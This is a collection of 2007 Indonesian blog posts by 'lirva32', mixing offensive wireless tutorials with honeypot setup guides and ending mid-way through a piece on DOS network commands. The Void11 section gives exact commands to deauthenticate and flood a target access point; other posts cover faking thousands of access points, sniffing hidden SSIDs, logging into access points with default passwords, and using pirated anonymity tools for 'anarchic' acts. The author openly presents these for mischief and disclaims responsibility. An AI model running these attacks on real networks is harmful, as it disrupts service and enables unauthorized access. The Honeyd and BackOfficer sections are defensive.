* High anonymity (elite proxy) - HTTP proxy server jenis ini tidak mengirimkan variable HTTP_X_FORWARDED_FOR, HTTP_VIA dan HTTP_PROXY_CONNECTION.

Apa yang membedakan anonymous proxy dan elite proxy adalah pengiriman variable HTTP_* oleh proxy server. Pada anonymous proxy, sangat dimungkinkan bagi remote host untuk mengetahui IP Address asli yang kita miliki dengan melihat variable HTTP_VIA dan HTTP_PROXY_CONNECTION.

Kalau Anda males cari2 anonymous proxy... ya sudah, lirva32 akan kasih tau beberapa tools yang memang cukup handal untuk membuat diri kita aman.
Tools2nya rata2 bayar sih...juga berbasis window$... tapi lirva32 akan mengangap.. dan selalu mengangap... kalo tools itu 'warez'.... Viva Wares... Happy Warez..., diantaranya :


- Steganos : Internet Anonym -
kalo tools yang ini gue sering pake banget ketika melakukan tindakan anarkis... gue ga usah pusing2
cari2 IP Proxy... bisa destroy tracing dan shredder lagi... keeyeeenn ddeehhh ;)



--------------------------------------------------------------------------------------------


- Hide IP Platinum -
lebih ringan.. lebih cepet.. banyak IP yang bisa digunakan untuk pemalsuan ;)




--------------------------------------------------------------------------------------------



- GhostSurf Platinum -
sama saja... biasa saja... tidak ada yang spesial... tapi tetap mumpuni...;)




--------------------------------------------------------------------------------------------


------|Appendix : Daftar Anonymous Proxy

Semoga bermanfaat.. maaf, kalo tulisan yang gue buat terlalu kiddies.. krn memang gue kiddies.... lol


.thx
lirva32


Shoutz :
. All echo|staff
. AllNewbieHacker,BekasiUnderGround
. MyDaughter : Faiza Debian Nafisa
. AllMyAssistant@BinaInsani





Last Updated ( Thursday, 23 August 2007 )

manual _Lirva32
Written by lirva32
Sunday, 08 July 2007
-- Melumpuhkan Access Point dengan Void11 --

Author : lirva32
Email : lirva32 [at] yahoo [dot] com


Wah, lirva32 mau ngajarin iseng2 nih... kali ini lirva mau melakukan DoS pada Access Point...
Jadi nanti AP akan dibanjiri dengan paket2 data... kalo udah banjir tuh AP bakalan ngedrop..
Gimna caranya...?? nanti dulu... lirva mau menjelaskan aplikasinya dulu....

Void11
Void11 merupakan salah satu aplikasi yang digunakan unutk melakukan mass flooding terhadap Access Point.
Void11 memiliki jenis metode attack, yaitu :

1. Deauthenticate Clients (default mode)
Dengan metode ini, void11 akan melakukan flooding WLAN dengan 'deauthentication packets' sehingga
client yang terautentikasi didalam jaringannya akan ngedrop dan terputus dari jaringan WLAN.

2. Authentication Flood
Dengan metode ini, void11 akan melakukan flooding ke Access Point dengan 'authentication packets (random client MACs)'

3. Association Flood
Dengan metode ini, void11 akan melakukan flooding dengan association packets (random client MACs)


Persiapan :
+ komputer | laptop yang udah ada wificard dengan chipset Prism.
+ Lakukan Wardriving utk mendapatkan MAC Address + SSID AP si target
+ Donlod void11 dari : http://lirva32.org/images/void11-0.2.0.tar.bz2
+ Konfigurasi :

cd /tools/wifi/void11-0.2.0/console

iwconfig wlan0 mode master

iwpriv wlan0 hostapd 1

./void11_hopper


alternatif void_hopper mode juga bisa meprgunakan :

iwconfig wlan0 channel 6 (set card to channel 6)


Penggunaan :
void11_penetration [interface] -D -s [type of attack] -s [station MAC] -S [SSID] -B [BSSID]


Penyerangan :
Misalkan saja kita ingin melakukan penyerangan terhadap sebuah AP, maka saya awali dulu dengan melakukan wardriving...biasanya saya mepergunakan kismet.
Dari hasil wardriving saya mendapatkan :

SSID : linksys
mAC : 00:06:BF:64:AB:35


Siapakan penyerangan sbb :
void11_penetration wlan0 -D -t 1 -S linksys -B 00:06:BF:64:AB:35


wah... APnya ngedrop... restart..... he..he....
selamat menikmati... lirva tidak bertangung jawab atas tindakan destruktif apapun....


Referensi :
www.wirelessdefense.org

Shoutz :
. echo|staff : y3dips,m0by,the_day,comex,z3r0byt3,k-159,c-a-s-e,s'to,anonymous
. Anakku : Faiza Debian Navisa... yang mengisi hari2ku dengan keceriaannya...
. My Friends : Mas Arif "s4k1tjiw4',az001, sevior,ocep_wie,sugeng_p,r34d3r,cbug,cyb3rtank,
cr4sh3r,,#SolpotCrew, #BekasiHacker,#kecoak, #kalengbekas, #samarinda_hack, #aikmel, #renjana and AllNewbieHacker, komar@bms.
. Asistenku : MadeSipit,Aghe,Arie
. MyAlamamater : FTI-BudiLuhurUniversity



Last Updated ( Tuesday, 10 July 2007 )

Hidden SSID Sniffing
Written by lirva32
Tuesday, 22 May 2007

- Hidden SSID Sniffing -

uuuppsss.... kali ini lirva32 mau ngabahas bagaimana caranya mencuri SSID yang terhidden. Maksudnya terhidden disini artinya si Admin mematikan fungsi SSID broadcasting (SSID Broadcasting Disable).
Apa yang terjadi bila si Admin melakukan penghiddenan terhadap SSID... yang pasti SSID tidak akan terbaca oleh siapapun yang melakukan wardriving.
Nah, gimana caranya menangkap SSID yang broadcastingnya disable...??? salah satunya dengan memanfaatkan SSIDSniff. Mungkin tidak hanya dengan SSIDSniff saja kok... banyak apklikasi2 lain yang bisa digunakan... tapi kali ini saya mempergunakan aplikai yang bernama SSIDSniff karena lebih oke dan bagus dibandingkan dengan aplikasi lainnya.


SSIDSniff
SSIDSiff merupakan tools yang bisa membantu kita dalam melakukan penetrasi test terhadap jaringan wireless.
SSIDSniff bisa digunakan dibeberapa wireless card yang mendukung frame 802.11.
SSIDSniff mempergunakan header packet 802.11 yang mampu menampilkan jaringan wireless (AP) yang sedang aktif.
SSIDSniff dikembangkan dan dapat bekerja dengan baik pada system operasi Linux.


Keunggulan SSIDSniff :
- Mudah dipergunakan (-- menurut saya lohhh.... ;
- Mampu mengurutkan packet data dengan kriteria : packets per second, number of data packets, dll.
- Dapat menangkap data tertentu dari (banyak sumber data) dan dapat dibuatkan file yang kompatible dengan libpcap capture files.
- Memberikan sebuah pesan seperti pergerakan cursordari suatu isi packet data
- Notifikasi berupa Audio dari kegiatan Wireless
- cccaaapppeee dddeeehhhhh......


Hardware yang Compatible (tested) :
- Cisco PCM-340, PCM-350
- Intel ipw2100
- Belskin WiFi Card
- Atheros


Cara mempergunakan :
- donlod di : http://apt.sw.be/redhat/7.3/en/i386/dag/RPMS/ssidsniff-0.36-0.dag.rh73.i386.rpm
- Unpack & Compile
- Konfigurasi khan wireless card Anda utk dapat menerima packer data (raw frame) 802.11
Dokumentasi dapat Anda baca disini : google aza ya mas.... aku lupa alamatnya...caaapppeee ddeehhh...
- Start ssidsniff as root: shell# ./ssidsniff -i


Kendala yang mebatasi SSIDSniff :
- Signal quality/noise level : sangat menentukan sekali dalam proses Sniffing
- SSIDSniff belum mampu melaukan Channel hopping




Ditulis di kantor tanggal 4 April 2007
Jam 19.22 BBWI


Semoga bermanfaat....

.thx
lirva32



Fake AP -- Memdirikan Ribuan AP Palsu
Written by lirva32
Tuesday, 22 May 2007


- Fake AP -- Mendirikan Ribuan Access Point Palsu -





wah... lirva32 bikin tulisan lagi nih...
kali ini lirva32 mau ngebahas tentang bagaimana cara membuat Fake AP.
Fake AP menghasilkan ribuan access point palsu,
gunanya adalah dapat menipu pengakses jaringan wireless dan juga dapat membingungkan hasil pelacakan melalui aplikasi wardrivers, NetStumbler.


Persiapannya nih.... :
1. WiFi Card berbasis chipset Prism2/2.5/3
2. Download aplikasi Fake Ap dari : http://www.blackalchemy.to/project/fakeap/


Cara meramu Fake Ap nya begini :

1. Compile the Host AP driver dan bisa Anda ambil disini - http://hostap.epitest.fi
Anda juga membutuhkan CVS snapshot driver untuk meng 'enable ' fungsi
MAC switching.
2. Edit 'fakeap.pl' untuk mereflect settingan dan paths.
3. Run 'fakeap.pl' dengan user : root
4. Have fun... Wink yyeeeaaahhhh........

Usage: fakeap.pl --interface wlanX [--channel X] [--mac XX:XX...]
[--essid NAME] [--words FILENAME] [--sleep N] [--vendors FILENAME]
[--wep N] [--key KEY] [--power N]

--channel X ---> Use static channel X
--essid NAME ---> Use static ESSID NAME
--mac XX:XX... ---> Use static MAC address XX:...
--words FILE ---> Use FILE to create ESSIDs
--sleep N ---> Sleep N Ssec between changes, default 0.25
--vendor FILE ---> Use FILE to define vendor MAC prefixes
--wep N ---> Use WEP with probability N where 0 <> Use KEY as the WEP key. Passed raw to iwconfig
--power N ---> Vary Tx power between 1 and N. In milliwatts


.thx
lirva32

dedicated to : Anakku "Faiza Debian", All echo|staff,AllCrewLabBinaInsani,
MyAlmamater : FTI_UnivBudiLuhur,buat * yang baca tulisan ini.....
juga buat mereka yang telah memberikan banyak kontribusi utk kemajuan
bangsa ini........
Last Updated ( Tuesday, 22 May 2007 )


Captive Portal : WiFiDog
Written by lirva32
Tuesday, 22 May 2007

- CAPTIVE PORTAL : WiFiDog -


Baru2 ini saya menerapkan Captive Portal yang cukup lumayan bagus... bukan cuma bagus kok... proses pemasangannya yang sangat mudah.... sangat user friendly banget...
Memang sih banyak banget aplikasi2 Captive Portal : NoCat, NoCatSplah,SWHS, etc deh... tapi sangat saya sayangkan yang agak2 ribet dalam penyetingannya.....

WifiDog memiliki feature2 sbb :
# Captive portal which lets hotspot owners communicate with their users (custom content management).
--- pemilik captive portal dapat berkomunikasi dengan usernya.

# Wifidog gateway runs on GNU/Linux server and embedded device like the Linksys WRT54G with OpenWRT.

---- gatewaynya berbasis linux server dan bisa di embed pada AP linksys WRT54G

# Multi-language support: English, French, German and Portuguese.

---- support dengan multi bahasa.

# Maintain the connection by checking network activity instead of a javascript window. This allows PDAs and cellphones to connect.

--- memiliki fasilitas : checking aktifitas network, dan membolehkan koneksi melalui PDA dan selular.

# Users are unique and have a valid email address in order to open an account. Their privacy must be respected. You can also use a splash only page and do not ask user to create an account.

--- user yang memiliki email address uniq yang dapat membuka account.. user pun dapat membuat splash page.

# Users are able to create a working account directly from any hotspot. New users sign on from any hotspot, create their account and are granted access for 15 minutes to confirm an email. If they don't, they are disconnected.

--- user dapat bekerja dengan accountnya di beberapa hotspot.

# Hotspot monitoring by two way heartbeating, so the central server always knows which hotspots are up, regardles of dynamic DNS, firewalls, etc.

---- monitoring aktifitas yang terjadi pada hotspot


# Firewall has one rule to jump in, one to jump out when a connection is rejected, and one to jump out when a connection is accepted. The gateway must do its own NAT. All this allows wifidog to be integrated easily into an existing firewall configuration.

-- ada firewall

# Statistics : Cumulative bandwidth usage accounting (per connection, per user, per hotspot)

--- statistik koneksi yang lengkap

# Self-identification of the gateways ???

--- pengarahan gateway secara otomatis


untuk lengkapnya Anda bisa baca di : http://dev.wifidog.org/
Silahkan di implementasikan.. jika Ada pertanya dan masalah tentang setting dan konfigurasi silahkan Anda posting disini....


.thx
lirva32
Last Updated ( Tuesday, 22 May 2007 )


Part 8 : Hacking 'Default' AP
Written by lirva32
Tuesday, 22 May 2007


- Hacking 'Default' AP -



Adakalanya AP tidak diset oleh si Admin... bisa disebabkan karena Adminnya malas atau memang tidak memiliki pengetahuan tentang "How To Set AP"
Nah, kalo kondisinya seperti itu berarti kita bisa memanfaat proses "Default Gaining"... artinya kita coba memasukkan 'account + password default' bawaan pabriknya.
Gimana sih caranya.... cukup tau product AP dan seriesnya saja.... Nah, kalo ga tau gimana...??
ya coba cari tau dung.....
hhhhiikkss... kalo ditempat saya kerja... saya bisa ngitip dari jendela merek AP nya itu apa...
dan kalo saya scanning AP nya pake NetStumbler.. nama AP nya itu masih default "Linksys".... nah,
saya coba menebak password defaultnya... tapi masih salah terus... gimana biar tau password defaultnya...
hhhmmm... gampang aza....
. Akses Inet.. kalo ga ada ya ke warnet aza...
. url : http://www.cirt.net/cgi-bin/passwd.pl
. pilih menu : Search Default Password
. Masukkan Merk Product
. Jrengggg... jrenngggg.... dapet tuh password defaultnya....


.thx


lirva32

Last Updated ( Tuesday, 22 May 2007 )


Manual _Lirva32
Membangun Banyak Server Palsu Pada HoneyD .

[ 4 of 5 tulisan ]
Author : lirva32 [at] yahoo [dot] com



Cieeee.. ketemu lagi nih.... ga bosen2 buka web lirva32 yah....?? atau sudah mulai menjemukkan...??? pengennya sih Kamu, Anda dan Kalian * tidak pernah bosan untuk mengunjungi web ini... hhhaaalllaaahhhhh, soalnya makin banyak yang mengunjungi situs ini itu artinya si pihak sponsor makin seneng dung... [mode : sambil lirik temen2 di rumahweb.com]. Hiikkk karena situs ini tidak akan pernah ada kalau tidak ada rumahweb.com, merekalah yang mensuport keberadaan situs ini... thx ya rumahweb.com...... [hhiikkss, nanti spacenya ditambahin lagi ga yah... biar bisa ngisi ebook..;)]
Btw, dari pertemuan honyed pertama sampe tulisan gue yang ketiga intinya hanya membahas bagaimana membuat konfigurasi untuk mendirikan 1 (only one) server palsu. Sebenarnya dengan beberapa trik saja kita bisa mendirikan banyak server palsu.
Kenapa harus mendirikan banyak server palsu..?? Jika kita bisa mendirikan banyak server palsu itu artinya semakin sempurnalah kita mencundangi si Attaker...bayangkan, pasti si Attacker makin bingung mempelajari keberadan system jaringan yang kita miliki... makin sulit untuk memetakan jaringan.. makin sulit untuk menebak target server sesungguhnya...iya ga..??? maka kemungkinan besar server asli kita tetap dalam kondisi aman... sekalipun harus tetap waspada.. waspadalah... (--hiikkss kayak pesen bang napi azah...).
Untuk percobaan kali ini, lirva32 akan mendirikan 4 (empat) server palsu, yaitu :
1. Windows 2000 Server
2. AIX
3. Windows 2003 Server
4. Windows NT Server

Bagaimana mendirikan banyak server palsu di honeyd :

Settingan 1 - Windows 2000 Server, simpan dengan nama file : config1.sample




Settingan 2 - AIX, simpan dengan nama file : config2.sample




Settingan 3 - Windows 2003 Server, simpan dengan nama file : config3.sample




Settingan 4 - Windows NT Server, simpan dengan nama file : config4.sample



Kini sudah ada 4 konfigurasi yang kita buat berati ada 4 server palsu yang akan kita buat... ;)
Nah, bagaimana agar 4 server palsu itu berjalan bersamaan...??? begini caranya :

1. Buat 1 (satu) batch file, misalkan saya memberi nama file tersebut dengan nama : eksekusi.bat
2. Isi file *.bat tersebut dengan script sbb :@echo off

cls
echo.
honeyd -d -f config1.sample -i 2 -l c:\Honeyd\log\honeyd1.log 192.168.10.0/24
honeyd -d -f config2.sample -i 2 -l c:\Honeyd\log\honeyd2.log 192.168.10.0/24
honeyd -d -f config3.sample -i 2 -l c:\Honeyd\log\honeyd3.log 192.168.10.0/24
honeyd -d -f config4.sample -i 2 -l c:\Honeyd\log\honeyd4.log 192.168.10.0/24
















3. Eksekusi *.bat tersebut, maka sekarang kita sudah memiliki banyak server ;)


Bagaimana di Linux...?? isi konfigurasinya sama seperti yang sudah saya paparkan diatas, hanya sedikit perbedaan saja kok... yaitu pada masalah eksekusinya, yaitu sbb :
1. Siapkan console : tty1, tty2, tty3 dan tty4
2. Eksekusi script dibawah ini pada masing2 tty :

tty1 :
# sudo ./honeyd -d -f config1.sample 192.168.10.0/24
tty2 :
# sudo ./honeyd -d -f config2.sample 192.168.0.10/24

tty3 :
# sudo ./honeyd -d -f config3.sample 192.168.0.10/24
tty4:
# sudo ./honeyd -d -f config4.sample 192.168.0.10/24


Akhirnya selesai sudah tulisan ke 4 (empat) ini.. kebetulan disamping gue lagi ada PushMove a.k.a Nita Wulandari... jadi gue mau ngobrol2 dulu sama die.. kan jauh2 datang musti diajak ngobrol.. jadi di stop dulu nih penulisannya.. nanti lanjut ke tulisan ke 5 (lima), ditunggu aja yah.... seee uuuuu...


.thx
lirva32



Last Updated ( Friday, 24 August 2007 )


Konfigurasi HoneyD[2]
Written by lirva32
Friday, 03 August 2007

. Konfigurasi HoneyD .

[ 3 of 5 tulisan ]
Author : lirva32 [at] yahoo [dot] com


Lanjut mannngggg... ini adalah tulisan ketiga loh, setelah melewati beberapa tapak perjalanan Bekasi - Cilengsi akhirnya sampai rumah juga.. Alhamdulillah... malam ini mata gue masih belum juga ngantuk sehingga gue masih bisa melanjutkan proses pembuatan tulisan yang merujuk pada bagaimana kita melakukan konfigurasi terhadap Honeyd.
Pada tulisan sebelumnya gue sudah membahas beberapa script konfigurasi pemalsuan terhadap server yang akan menjadi obyek serangan para hacker dan para manusia yang mengaku dirinya hacker... he..he...

Masih ada berapa script yang bisa dihasilkan dari mekanisme konfigurasi honeyd, sebagai nutrisi tambahan ada script sbb :

Rubah isi config.sample dengan script di bawah ini untuk mendirikan Server 2003 + Exchange Server palsu :




Rubah isi config.sample dengan script di bawah ini untuk mendirikan AIX palsu :



masih.. masih banyak sekali server2 palsu yang bisa dihasilkan oleh honeyd... btw, dari kemarin udah ngomongin Honeyd... cara pembuatan konfigurasinya.. and gue lupa banget nyampein sesuatu bahwa ketika honeyd didirikan memerlukan beberapa skrip pelengkap.. yaitu :exchange-imap.sh exchange-nntp.sh
exchange-pop3.sh exchange-smtp.sh
ftp.sh iis.sh
ldap.sh msftp.sh
pop3.sh smtp.sh
vnc.sh etc...



tenang... file2 tersebut bisa elo donload di : http://lirva32.org/download/

Okeh deh.. selamat malam untuk semuanya...selamat menikmati Honeyd... lol


.thx

lirva32


Last Updated ( Tuesday, 07 August 2007 )


Konfigurasi HoneyD
Written by lirva32
Thursday, 02 August 2007

. Konfigurasi HoneyD .

[ 2 of 5 tulisan ]
Author : lirva32 [at] yahoo [dot] com


waaahh.. ini tulisan gue yang kedua tentang Honeyd, jadi buat elo yang belum baca tulisan pertama diharuskan membacanya... biar ga jadi Jaka Sembung... he..he...
Kalo kita main Honeyd dan diimplementasikan sebagai honeypot itu artinya kita harus siap cape bin pegel untuk membuat konfigurasi server palsu yang kita inginkan, tapi jangan khawatir.. lirva32 akan bahas bagaimana membuat konfigurasinya, mungkin supaya elo tidak kehilangan jejak tentang cara membuat konfigurasinya maka gue akan menampilkan konsep pembuatan script server palsunya, di linux atau windows script konsepnya tetap sama, sbb:
membaca file konfigurasi, konfigurasi dibuat dengan :

config = creation | addition | binding | set | annotate | route [config]
creation= "create" template-name | "create" "default"
addition= "add" template-name proto "port" port-number action
binding = "bind" ip-address template-name |
"clone" template-name template-name
set = "set" template-name "default" proto "action" action |
"set" template-name "personality" personality-name |
"set" template-name "personality" "random"
"set" template-name "subsystem" cmd-string
"set" template-name "uptime" seconds
"set" template-name "droprate" "in" percent
"set" template-name "uid" number ["gid" number]
"set" ip-address "uptime" seconds
annotate= "annotate" personality-name [no] finscan |
"annotate" personality-name "fragment" ("drop" | "old" | "new")
route = "route" "entry" ipaddr |
"route" ipaddr "link" ipnetwork |
"route" ipaddr "add" "net" ipnetwork ipaddr ["latency" number"ms"] ["loss" percent]
proto = "tcp" | "udp" | "icmp"
action = "block" | "open" | "reset" | cmd-string | "proxy" ipaddr":"port























hhhiikkkksss betapa pusingnya kalo liat konsep script itu... iya ga...??? nah, biar ga pusing sebenarnya ketika kita melakukan instlasi honeyd maka honeyd sudah menyiapkan1 (satu) file konfigurasi yang nama filenya itu : config.sample.
Isi file : configuration.sample itu sepeti tampilan berikut ini :



Sekarang gini aja, lirva32 akan siapkan beberapa script yang siap pakai... nanti script yang ada pada file : configuration.sample isinya dibuang alias d i t i b a n dengan script yang udah lirva32 buat... lirva32 buat juga berdasarkan sample yang udah di oprak-oprek sana-sini.. sampe2 tuh script ledes kali karena kebanyakan di oprak-oprek.. ;)

Rubah isi config.sample dengan script di bawah ini untuk mendirikan Server 2000 palsu :




Rubah isi config.sample dengan script di bawah ini untuk mendirikanWindows XP palsu :




Rubah isi config.sample dengan script di bawah ini untuk mendirikanWindows NT Server palsu :




Pengujian Script & Mengaktifkan Honeyd :

windows :


c:\honeyd\honeyd -d -f config.sample -i 2 -l c:\Honeyd\log\honeyd3.log 192.168.10.0/24

Linux :

# ./honeyd -d -f config.sample 192.168.10.0/24

or

# sudo ./honeyd -d -f config.sample 192.168.10.0/24

* keterangan : 192.168.10.0/24 merupakan IP yang dipantau trafic datanya

aaahhh.. lelah juga yah belajar Honeyd... tapi gpp namanya juga belajar... iya ga...???
btw, karena mahasiswa lirva sudah pada nunggu dikelas... jadi lirva32 mo ngajar dulu yah.. tulisan ini lirva tutup dulu... nanti nyambung pada tulisan yang ketiga yah..... semoga menjadi tulisan yang bermanfaat.


.thx
lirva32

greetz :
. Ibunda terkasih yang kasihnya mengairi ladangku dimusim kemarau sekalipun
semoga bunda yang sedang terbaring sakit... kembali sehat selalu... Thx Ya Rabb...
. AllEchoStaff, AllNewBieHacker
. Anakku : Faiza Debian Nafisa
. MyAssistantAllCrewLabBinaInsani
. MyAlmamater : FTI-Univ.BudiLuhur


Last Updated ( Tuesday, 07 August 2007 )
Read more...


HoneyD
Written by lirva32
Wednesday, 01 August 2007
. HONEYD .
-- honeypot dengan modul terlengkap --
[ 1 of 5 tulisan ]

Author : lirva32 [at] yahoo [dot] com

Alhamdulillah Ya Rabb...
Akhirnya gue bisa kembali nulis setelah 7 hari lamanya bersemedi ngurusin kerjaan kantor...
sambil ditemani lagu "Dirimu" dari Gank Pegangsaan gue membuat tulisan ini, kali ini lirva32 mau membahas salah satu honepot yang gue anggap paling bagus setelah Sebex, yaitu : Honeyd.
Honeyd gue katagorikan sebagai High Interaction Honepots, kenapa..?? karena memang tingkat aksi dan pemodelan yang diciptakan mampu dan sangat mampu untuk mengenali berbagai jenis serangan yang dilakukan oleh Attacker. Tidak hanya itu, banyak sekali dukugan modul yang sangat mumpuni untuk dijadikan teman sejatinya di honeyd. Heneyd dapat menciptakan virtual host berbabasis IP didalam jaringan Anda,virtual host tersebut sangat mirip dengan virual host aslinya loh...dapat mensimulasikan layanan TCP dan UDP yang dapat mengembalikan permintaan ICMP (ICMP request) dan yang sangat mengagumkan buat gue, honeyd menutup secara default UDP port dan honeyd akan memberikan jawaban untuk ICMP yang tidak dapat dicapai.
Honeyd ada versi Linux juga ada versi Windowsnya loh.. jadi buat elo yang biasa pake windows jangan berkecil hati.. masih bisa ditemani dengan honeyd.
Bagaimana mendirikan honeyd :

[+] donlod aza honeyd di : http://lirva32.org/download/

jika Anda melakukan perubahan terhadap source honeyd, Anda harus melakukan proses compile ssb :

1. siapkan library :
. libevent-win32(http://www.secuirtyprofiling.com)
. libdnet-msvc(http://www.secuirtyprofiling.com)
. winpcap Developer Pack(ttp://winpcap.polito.it/)
. Microsoft Platform SDK.

2. Ekstrak semua library tersebut kedalam sebuah folder, dengan hirarki sbb :
\direktori_anda
\libdnet-1.5
\libevent-0.6
\wpdpack
\honeyd-0.5

3. Buka file project honeyd (honeyd.dsw) dengan MS VC++ 6.
man... jangan di buka pake Visual .N[y]et yang man.... soalna ga support...

4. Pastikan juga MS. SDK Platform SDK sudah terinstall.
5. Lakukan prose compiler sehingga terbentuk honeyd.exe.

--- kalo ga ada perubahan, yo wis a usah melakukan compile2 lagi.. tinggal pake aza...


--- Yang pake windows :
[+] donlod juga WinPCAP, pada percobaan kali ini gue mempergunakan WinPCAP 3.0 (-- hiikkss.. ga tau versi terbarunya..)
[+] Install cygwin
[+] buat 1 (satu) folder pada dengan nama 'honeyd' pada drive C (-ingat.. honeydnya kagak pake tanda kutip...!!!)
[+] ekstrak file kompresinya pada folder tersebut.

Terus gimana dung kalo di Linux...?? pada saat tulisan ini gue buat, gue uji coba di OpenSuSe 10.1, dengan langkah :
[+] dependensi : libevent, libdnet, libpcap
[+] buat sebuah folder
[+] ekstrak source ke folder tersebut
[+] # ./configure
# make
# make install

Bagaimana menjalankan honeyd windows :

c:\direktori\honeyd

Pilihan parameter sbb :-d tidak mengerjakan proses daemon dan mengaktifkan debugging
-P untuk mendapatkan notifikasi pcap
-W daftar interface, cuma di win32 loh...
-l logfile membuat log file
-p fingerprints membaca hasil NMAPRead nmap fingerprints.
-x xprobe membaca xprobe fingerprints.
-a assoc membaca associates nmap fingerprints
-f file membaca file konfigurasi, konfigurasi dibuat dengan :

config = creation | addition | binding | set | annotate | route [config]
creation= "create" template-name | "create" "default"
addition= "add" template-name proto "port" port-number action
binding = "bind" ip-address template-name |
"clone" template-name template-name
set = "set" template-name "default" proto "action" action |
"set" template-name "personality" personality-name |
"set" template-name "personality" "random"
"set" template-name "subsystem" cmd-string
"set" template-name "uptime" seconds
"set" template-name "droprate" "in" percent
"set" template-name "uid" number ["gid" number]
"set" ip-address "uptime" seconds
annotate= "annotate" personality-name [no] finscan |
"annotate" personality-name "fragment" ("drop" | "old" | "new")
route = "route" "entry" ipaddr |
"route" ipaddr "link" ipnetwork |
"route" ipaddr "add" "net" ipnetwork ipaddr ["latency" number"ms"] ["loss" percent]
proto = "tcp" | "udp" | "icmp"
action = "block" | "open" | "reset" | cmd-string | "proxy" ipaddr":"port
-i interface interface yang dipergunakan
net IP address atau network (bisa dispesifikasikan utk notasi CIDR)




































karena gue pake SuSe : # ./honeyd

kalo yang pake sudo :

# sudo ./honeyd

Nah... sampe sini dulu yah.. tulisan ini sengaja saya buat berseri sampe 5 (l i m a) seri loh... soalnya memang panjang banget pembahasannya.
Mudah2an ga bingung.. kalo bingung silahkan hubungi gue aza lewat email... tetap semangat untuk belajar dung.. okeh...?? siippp kalo okeh...
sekarang lirva mau bobo dulu, karena sudah jam 11 malam... besok pagi harus bangun untuk pergi ke kantor...
btw, kalo Ada lowongan kerja lirva32 mauuu dung... karena memang sudah tidak betah dikantor ini.. soalnya gajinya pas2an... lirva juga kan mau punya uang banyak buat beli laptop... server... dan keperluan riset lainya deh... ayo tawarin lirva kerja dung...



.thx
lirva32


Greetz :
. Ibunda tercinta yang sedang terbaring sakit... smoga lekas sembuh demi anakmu yang masih seperti ini... ayo dong mi... cepet sembuh... aku kangen dengan senyum mami....
. AllEchoStaff, AllEchoMember
. Anakku "Faiza Debian Nafisa"
. MyOffice : thx for the laptop
. MyAlmamater UBL
. AllMyCrewLabBinaInsani..thx 4 ur dedication to me... ;)
Last Updated ( Thursday, 02 August 2007 )
Read more...


NFR BackOfficer
Written by lirva32
Friday, 20 July 2007

. Si Kecil Yang Cerdas .
[ BackOfficer Friendly ]




Kecil.. cerdas... ya BackOfficer Friendly lah...
Dia merupakan honeypot yang paling kecil ukurannya... tapi sangat mumpuni untuk dijadikan Honeypot berbasis windows. Tidak seperti Honeypot lainnya yang sangat sulit pada proses implementasi.
Seimbang dengan ukurannya yang kecil maka dia saya katagorikan sebagai 'low interaction honeypot'. Informasi tentang apa saja yang dilakukan Attacker tidak disimpan kedalam sebuah file log tetapi disampaikan langsung pada interface GUI monitoringnya.


Bagaimana mendirikan BackOfficer Friendly :
[-] Siapkan jaringan Anda

[-] Siapkan 1 (satu) server berbasis Windows, biarkan kondisi settingannya secara default (-- ga usah diupdate.. ga usah di path)
biarkan berlubang.. krn kalo hackernya cowo suka banget sama lubang.... uuppppssss porno ;)
Dalam uji coba kali ini saya mendirikan server berbasis 2000 Server yang tidak saya kasih service pack sedikitpun.. summmmppaahh...
jangankan karberos.. sp saja ga gue kasih kok...

[-] Donwload BOF di : http://lirva32.org/download/bof.zip

[-] Lakukan proses instalasi, hasil instalasi tidak menghasilkan 'shortcut' ambil saja di Program Files --> NFR --> ekskusi NFR

[-] Lihat di system tray ada logo NFR, aktifkan.




Nah, itu tampilan NFR BackOfficer monitoring... jadi semua tindakan yang dilakukan Attacker akan terlihat dibagian monitoring... ga usah cape2 mempelajari file log... cukup sederhanan kan...??

Bagaimana Mensettingnya ?
hhiikksss.. kan gue udah bilang.. ini Haoneypot termudah yang ga perlu banyak setingan.. tapi cukup mumpuni... ;)
Nih, lihat....




[*] Jika tanda checklist diaktifkan itu artinya NFR siap memantau services.




[*] Perhatikan pada tampilan tersebut diatas semua aktifitas yang dilakukan Attacker akan tercatat di monitoring.
Silahkan Anda lakukan penyerangan terhdapa server yang sudah Anda pasangi si kecil.. hhhmmm tindakan Attakingnya bisa ketauan... dan sangat mudah untuk mengenal teknik penyerangan yang dipergunakan...

Selamat menikmati si kecil nan cerdas... ;)



.thx
lirva32
Last Updated ( Friday, 20 July 2007 )



Hacking by dos
Microsoft DOS datang dengan beberapa hacking tool tersembunyi yang akan saya diskusikan disini. Tool ini dapat ditemukan pada direktori c:\windows jika anda menggunakan win98 dan jika anda menggunakan winxp maka tool ini berada pada C:\winxp\system32. WinXP, Win2000 dan WinNT dirilis dengan beberapa tool internet tambahan. Jadi jika anda masih menggunakan win98 maka saya menyarankan agar menggantinya dengan WinXP. Yang tentunya memiliki fitur securiti tambahan dan perintah hacking internet yang bagus. Dalam manual ini saya akan membahas mengenai beberapa perintah yang ditemukan pada Win98 dan winXP

Jadi bagi pengguna window, berikut ini perintah-perintah hacking pada DOS.

1. ping
2. tracert
3. telnet
4. ftp
5. netstat

OK, inilah keterangannya.

1. ping

Utiliy ini digunakan untuk mencari keberadaan remote host. Yan gmengirmkan sebuah signal SYN ke remote host dan jika remote host membalas maka berarti memang ada suatu remote machine.

Cobalah anda ketik perintah ini:

C:\windows>ping/?

*************
Newbie tip: mengetik '/?' setelah perintah dos menampilkan helpnya. Jadi bagaimana anda belajar aneka perintah dos. Bukankah WinXP, WinNT dan Win2000 juga memiliki perintah help untuk menampilkan seluruh perintah dos.
*************
Usage: ping [-t] [-a] [-n count] [-l size] [-f] [-i TTL] [-v TOS]
[-r count] [-s count] [[-j host-list] | [-k host-list]]
[-w timeout] destination-list

Options:
-t Ping the specified host until stopped.
To see statistics and continue - type Control-Break;
To stop - type Control-C.
-a Resolve addresses to hostnames.
-n count Number of echo requests to send.
-l size Send buffer size.
-f Set Don't Fragment flag in packet.
-i TTL Time To Live.
-v TOS Type Of Service.
-r count Record route for count hops.
-s count Timestamp for count hops.
-j host-list Loose source route along host-list.
-k host-list Strict source route along host-list.
-w timeout Timeout in milliseconds to wait for each reply.

Jadi saya dapat melakukan ping ke ip address apapun atau domain name untuk memeriksa keberadaannya di internet. Sebagai contoh saya mengetik ping localhost maka saya mendapatkan.


Pinging chintan [127.0.0.1] with 32 bytes of data:

